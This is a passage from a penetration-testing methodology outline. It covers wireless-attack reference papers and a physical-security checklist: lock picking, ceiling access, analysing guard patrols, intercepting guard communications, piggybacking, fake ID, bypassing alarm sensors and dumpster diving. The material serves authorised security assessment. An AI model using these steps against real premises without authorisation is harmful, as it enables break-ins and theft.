26.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
26.3.6.2. White Papers
26.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
26.3.6.2.2. 802.11b Firmware-Level Attacks
26.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
26.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
26.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
26.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
26.3.6.2.7. Active behavioral fingerprinting of wireless devices
26.3.6.3. Common Vulnerabilities and Exposures (CVE)
26.3.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
27. Physical Security
27.1. Building Security
27.1.1. Meeting Rooms
27.1.1.1. Check for active network jacks.
27.1.1.2. Check for any information in room.
27.1.2. Lobby
27.1.2.1. Check for active network jacks.
27.1.2.2. Does receptionist/guard leave lobby?
27.1.2.3. Accessible printers? Print a test page.
27.1.2.4. Obtain phone/personnel listing.
27.1.3. Communal Areas
27.1.3.1. Check for active network jacks.
27.1.3.2. Check for any information in room.
27.1.3.3. Listen for employee conversations.
27.1.4. Room Security
27.1.4.1. Resistance of lock to picking.
27.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
27.1.4.2. Ceiling access areas.
27.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
27.1.5. Windows
27.1.5.1. Check windows/doors for visible intruder alarm sensors.
27.1.5.2. Check visible areas for sensitive information.
27.1.5.3. Can you video users logging on?
27.2. Perimeter Security
27.2.1. Fence Security
27.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
27.2.2. Exterior Doors
27.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
27.2.3. Guards
27.2.3.1. Patrol Routines
27.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
27.2.3.2. Communications
27.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.
27.3. Entry Points
27.3.1. Guarded Doors
27.3.1.1. Piggybacking
27.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
27.3.1.2. Fake ID
27.3.1.2.1. Attempt to use fake ID to gain access.
27.3.1.3. Access Methods
27.3.1.3.1. Test 'out of hours' entry methods
27.3.2. Unguarded Doors
27.3.2.1. Identify all unguarded entry points.
27.3.2.1.1. Are doors secured?
27.3.2.1.2. Check locks for resistance to lock picking.
27.3.3. Windows
27.3.3.1. Check windows/doors for visible intruder alarm sensors.
27.3.3.1.1. Attempt to bypass sensors.
27.4. Office Waste
27.4.1. Dumpster Diving. Attempt to retrieve any useful information from ToE refuse. This may include printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.
28. Final Report - template
29. Contributors
29.1. Matt Byrne (WirelessDefence.org)
29.1.1. Matt contributed the majority of the Wireless section.
29.2. Arvind Doraiswamy (Paladion.net)
29.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
29.3. Lee Lawson (Dns.co.uk)
29.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.